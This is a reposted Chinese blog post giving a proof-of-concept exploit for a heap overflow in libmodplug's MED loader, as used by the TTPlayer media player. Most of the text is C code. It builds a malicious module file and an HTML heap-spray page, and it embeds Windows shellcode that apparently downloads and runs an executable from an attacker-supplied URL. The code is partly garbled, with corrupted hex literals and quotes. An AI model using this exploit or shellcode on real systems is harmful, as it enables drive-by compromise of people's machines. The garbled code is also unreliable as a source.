导读:上个月看的洞,昨天晚上又重新翻看了一下这个洞,终于看到了成功利用的可能性。
远程和本地攻击最终都可以利用,只是本地攻击的成功率比较低一些,头疼。详细的利用代码不贴了,细节可以看看 libmod(libmodplug)的源码。下面是远程部分的 PoC,其中 2 个关键的 DWORD 值已隐藏。
代码:
/*
libmodplug v0.8, load_med.cpp
BOOL CSoundFile::ReadMed(const BYTE *lpStream, DWORD dwMemLength)
line 670: memcpy(m_lpszSongComments, lpStream+annotxt, annolen);

千千静听使用 libmod(libmodplug)来进行 mod 类文件格式的处理。此库在 ReadMed 函数中,没有检查
文件中描述的注释偏移(annotxt)和长度(annolen)是否落在 dwMemLength 范围之内,就直接交给 memcpy;如果传递一个恶意构造的值,将导致堆溢出。修复方法是在 memcpy 之前校验 annotxt 和 annolen 均不超出 dwMemLength(并注意两者相加时的整数溢出)。现在采用 libmod 的软件很多,都应该存在此问题。 */
/*
author: dummy    e-mail: dummyz@126.com    date: 2008/02/25
*/ #include
#include #pragma pack(1)
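/*
 * On-disk headers of the MED/OctaMED ("MMD0") module format as read by
 * libmodplug's CSoundFile::ReadMed (load_med.cpp).  The structs are packed
 * with #pragma pack(1) (set just above) so sizeof() matches the on-disk
 * layout; multi-byte fields are stored big-endian in the file and are
 * converted with bswapBE16/bswapBE32 when the file is written or parsed.
 *
 * Every field below comes straight from an untrusted file.  The offset and
 * length fields (song, blockarr, smplarr, expdata, annotxt/annolen,
 * songname/songnamelen, ...) are file-relative and must be range-checked
 * against the buffer length (dwMemLength) before they are dereferenced or
 * passed to memcpy; ReadMed's missing check on annotxt/annolen is the
 * heap overflow described in the header comment of this file.
 */
typedef struct tagMEDMODULEHEADER
{
    DWORD id;           // MMD1-MMD3
    DWORD modlen;       // Size of file
    DWORD song;         // Position in file for this song
    WORD  psecnum;
    WORD  pseq;
    DWORD blockarr;     // Position in file for blocks
    DWORD mmdflags;
    DWORD smplarr;      // Position in file for samples
    DWORD reserved;
    DWORD expdata;      // Absolute offset in file for ExpData (0 if not present)
    DWORD reserved2;
    WORD  pstate;
    WORD  pblock;
    WORD  pline;
    WORD  pseqnum;
    WORD  actplayline;
    BYTE  counter;
    BYTE  extra_songs;  // # of songs - 1
} MEDMODULEHEADER;

typedef struct tagMMD0SAMPLE
{
    WORD rep, replen;
    BYTE midich;
    BYTE midipreset;
    BYTE svol;
    signed char strans;
} MMD0SAMPLE;

// MMD0/MMD1 song header
typedef struct tagMMD0SONGHEADER
{
    MMD0SAMPLE sample[63];
    WORD numblocks;         // # of blocks
    WORD songlen;           // # of entries used in playseq
    BYTE playseq[256];      // Play sequence
    WORD deftempo;          // BPM tempo
    signed char playtransp; // Play transpose
    BYTE flags;             // 0x10: Hex Volumes | 0x20: ST/NT/PT Slides | 0x40: 8 Channels song
    BYTE flags2;            // [b4-b0]+1: Tempo LPB, 0x20: tempo mode, 0x80: mix_conv=on
    BYTE tempo2;            // tempo TPL
    BYTE trkvol[16];        // track volumes
    BYTE mastervol;         // master volume
    BYTE numsamples;        // # of samples (max=63)
} MMD0SONGHEADER;

typedef struct tagMMD0EXP
{
    DWORD nextmod;          // File offset of next Hdr
    DWORD exp_smp;          // Pointer to extra instrument data
    WORD  s_ext_entries;    // Number of extra instrument entries
    WORD  s_ext_entrsz;     // Size of extra instrument data
    DWORD annotxt;          // File offset of the song comment text
    DWORD annolen;          // Length of the song comment; ReadMed copies exactly this many bytes from lpStream+annotxt
    DWORD iinfo;            // Instrument names
    WORD  i_ext_entries;
    WORD  i_ext_entrsz;
    DWORD jumpmask;
    DWORD rgbtable;
    BYTE  channelsplit[4];  // Only used if 8ch_conv (extra channel for every nonzero entry)
    DWORD n_info;
    DWORD songname;         // Song name
    DWORD songnamelen;
    DWORD dumps;
    DWORD mmdinfo;
    DWORD mmdrexx;
    DWORD mmdcmd3x;
    DWORD trackinfo_ofs;    // ptr to song->numtracks ptrs to tag lists
    DWORD effectinfo_ofs;   // ptr to group ptrs
    DWORD tag_end;
} MMD0EXP;

#pragma pack()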
// Byte swapping functions from the GNU C Library and libsdl
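/* Swap bytes in 16 bit value. */
/*
 * The GCC variants are statement expressions: the argument is evaluated
 * exactly once (into __bsx), so side effects in the argument are safe.
 * The fallback static inline functions have the same contract.
 */
#ifdef __GNUC__
# define bswap_16(x) \
    (__extension__ \
     ({ unsigned short int __bsx = (x); \
        ((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8)); }))
#else
static __inline unsigned short int
bswap_16 (unsigned short int __bsx)
{
  return ((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8));
}
#endif

/* Swap bytes in 32 bit value. */
#ifdef __GNUC__
# define bswap_32(x) \
    (__extension__ \
     ({ unsigned int __bsx = (x); \
        ((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) | \
         (((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24)); }))
#else
static __inline unsigned int
bswap_32 (unsigned int __bsx)
{
  return ((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) |
          (((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24));
}
#endif

/*
 * Host-to-file conversions.  bswapLE* are identity on little-endian hosts,
 * bswapBE* are identity on big-endian hosts; the MED header fields are
 * big-endian on disk, so the file writer below uses bswapBE32 on them.
 */
#ifdef WORDS_BIGENDIAN
#define bswapLE16(X) bswap_16(X)
#define bswapLE32(X) bswap_32(X)
#define bswapBE16(X) (X)
#define bswapBE32(X) (X)
#else
#define bswapLE16(X) (X)
#define bswapLE32(X) (X)
#define bswapBE16(X) bswap_16(X)
#define bswapBE32(X) bswap_32(X)
#endif

/* Total size, in bytes, to which the generated module file is padded. */
#define FILE_SIZE_ 0x30000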
// 远程攻击#if 0// 成功率很低#define NOP_ "/"%u090a?/""#define HEAP_ADDR_ 码#else// 成功率很高#define NOP_ "/"邐邐/""#define HEAP_ADDR_ 码 #endif
const unsigned char shellcode[174] =
{ // 必须是偶数大小0xE8, 0×00, 0×00, 0×00, 0×00, 0×6A, 0×03, 0xEB, 0×21, 0×7E, 0xD8, 0xE2, 0×73, 0×98, 0xFE, 0×8A, 0×0E, 0×8E, 0×4E, 0×0E, 0xEC, 0×55, 0×52, 0×4C, 0×4D, 0×4F, 0×4E, 0×00, 0×00, 0×36, 0×1A, 0×2F, 0×70, 0×63, 0×3A, 0×5C, 0×63, 0×2E, 0×65, 0×78, 0×65, 0×00, 0×59, 0×5F, 0xAF, 0×67, 0×64, 0xA1, 0×30, 0×00, 0×8B, 0×40, 0×0C, 0×8B, 0×70, 0×1C, 0xAD, 0×8B, 0×68, 0×08, 0×51, 0×8B, 0×75, 0×3C, 0×8B, 0×74, 0×2E, 0×78, 0×03, 0xF5, 0×56, 0×8B, 0×76, 0×20, 0×03, 0xF5, 0×33, 0xC9, 0×49, 0×41, 0xAD, 0×03, 0xC5, 0×33, 0xDB, 0×0F, 0xBE, 0×10, 0×38, 0xF2, 0×74, 0×08, 0xC1, 0xCB, 0×0D, 0×03, 0xDA, 0×40, 0xEB, 0xF1, 0×3B, 0×1F, 0×75, 0xE7, 0×5E, 0×8B, 0×5E, 0×24, 0×03, 0xDD, 0×66, 0×8B, 0×0C, 0×4B, 0×8B, 0×5E, 0×1C, 0×03, 0xDD, 0×8B, 0×04, 0×8B, 0×03, 0xC5, 0xAB, 0×59, 0xE2, 0xBC, 0×8B, 0×0F, 0×80, 0xF9, 0×63, 0×74, 0×0A, 0×57, 0xFF, 0xD0, 0×95, 0xAF, 0xAF, 0×6A, 0×01, 0xEB, 0xAC, 0×52, 0×52, 0×57, 0×8D, 0×8F, 0xDB, 0×10, 0×40, 0×00, 0×81, 0xE9, 0×4E, 0×10, 0×40, 0×00, 0×51, 0×52, 0xFF, 0xD0, 0×6A, 0×01, 0×57, 0xFF, 0×57, 0xEC, 0xFF, 0×57, 0xE8, 0×90}; const char* script1 = /
"<script>""var sc=unescape(/"";const char* script2 = /"/");""fb=unescape(" NOP_ ");""while(fb.length<0×30000)fb+=fb;""m=new Array();""for(x=0;x<400;x++)m[x]=sc+fb+sc;""setTimeout(/'ttp.URL=/"";const char* script3 = /"/";ttp.controls.play();/', 3);</script>"""""; void make_med_file(const char* path)
{ MEDMODULEHEADER mmh;MMD0SONGHEADER msh;MMD0EXP mex;FILE* file;long p; memset(&mmh, 0, sizeof (mmh));
memset(&msh, 0, sizeof (msh));memset(&mex, 0, sizeof (mex)); p = 0;
mmh.id = 0×30444D4D; // version = '0'
p += sizeof (MEDMODULEHEADER);
mmh.song = bswapBE32(p); p += sizeof (MMD0SONGHEADER);
mmh.expdata = bswapBE32(p); p += sizeof (MMD0EXP);
mex.annolen = bswapBE32(-1);mex.annotxt = bswapBE32(p); file = fopen(path, "wb+");
if ( file == NULL ){ printf("create file failed!/n");exit(0);}else{ fwrite(&mmh, 1, sizeof (mmh), file);fwrite(&msh, 1, sizeof (msh), file);fwrite(&mex, 1, sizeof (mex), file); while ( ftell(file) < FILE_SIZE_ )
{ fwrite(HEAP_ADDR_, 1, 4, file);} fclose(file);
printf("successed!/n");}} void make_htlm_file(const char* htmlpath, const char* s3mpath, const char* url)
{ FILE *file = fopen(htmlpath, "w+");if ( file == NULL ){ printf("create '%s' failed!/n", htmlpath);exit(0);} fprintf(file, "%s", script1);
for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]); const unsigned l = strlen(url);
for ( unsigned j = 0; j < l; j += 2 )fprintf(file, "%%u%02X%02X" , url[j + 1], url[j]); fprintf(file, "%s%s%s", script2, s3mpath, script3);
fclose(file); printf("make '%s' successed!/n", htmlpath);
} int main(int argc, char* argv[])
{ printf("ttplayer stack exp poc by dummyz@126.com/n");if ( argc <= 1 ){ printf("need argv!(ex: %s http://xxx.xxx/xx.exe/n", argv[0]);return -1;} printf("+ make_med_file…/n");
make_med_file("c://shit.s3m"); printf("+ make_htlm_file…/n");
make_htlm_file("poc.html", "c://shit.s3m", argv[1]); printf("done./n");
return 0;}
转载地址:http://njiob.baihongyu.com/